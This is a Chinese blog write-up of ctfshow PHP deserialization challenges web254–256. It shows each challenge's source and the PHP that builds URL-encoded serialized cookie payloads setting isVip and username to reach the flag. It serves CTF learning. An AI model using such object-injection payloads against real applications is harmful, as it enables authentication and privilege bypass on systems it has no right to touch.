ctfshow--反序列化WP

刷题随笔

web254

题目

直接传参，没啥好说的

web255

题目

<?php error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

构造序列串

<?php 
class ctfShowUser{
   public $isVip;
  public function __construct(){
   $this->isVip=true;
}
}
$a=new ctfShowUser();
echo serialize($a);

得到序列串O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}

通过设置cookie传递后并没有发现flag

于是在本地试一下传参￥$_Cookie变量会变成什么

猜测应该是Cookie的user参数中的分号导致后面的序列串被分隔

通过URL编码即可

web256

题目

<?php 
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

构造序列化串

<?php
class ctfShowUser{
    public $username;
    public $isVip;
    public function __construct(){
        $this->isVip=true;
        $this->username="aaa";
    }
}
$a=new ctfShowUser();
echo urlencode(serialize($a));

?username=aaa&password=xxxxxx
O:11:"ctfShowUser":2:{s:8:"username";s:3:"aaa";s:5:"isVip";b:1;}
URL编码一下

web257

posted @ 2022-10-26 22:50 LinkPoc 阅读(98) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CTFSHOW-SSRF篇

· ctfshow--RCE

· 4. CTFshow 反序列化 web255

· 3. CTFshow 反序列化 web254

· 5. CTFshow 反序列化 web256

公告

昵称： LinkPoc
园龄： 4年1个月
粉丝： 19
关注： 9

+加关注

2025年3月

日

一

二

三

四

五

六

YouHe

ctfshow--反序列化WP

web254

web255

web256

web257

公告

搜索

常用链接

最新随笔

随笔分类 (162)

随笔档案 (66)

阅读排行榜

评论排行榜

推荐排行榜

最新评论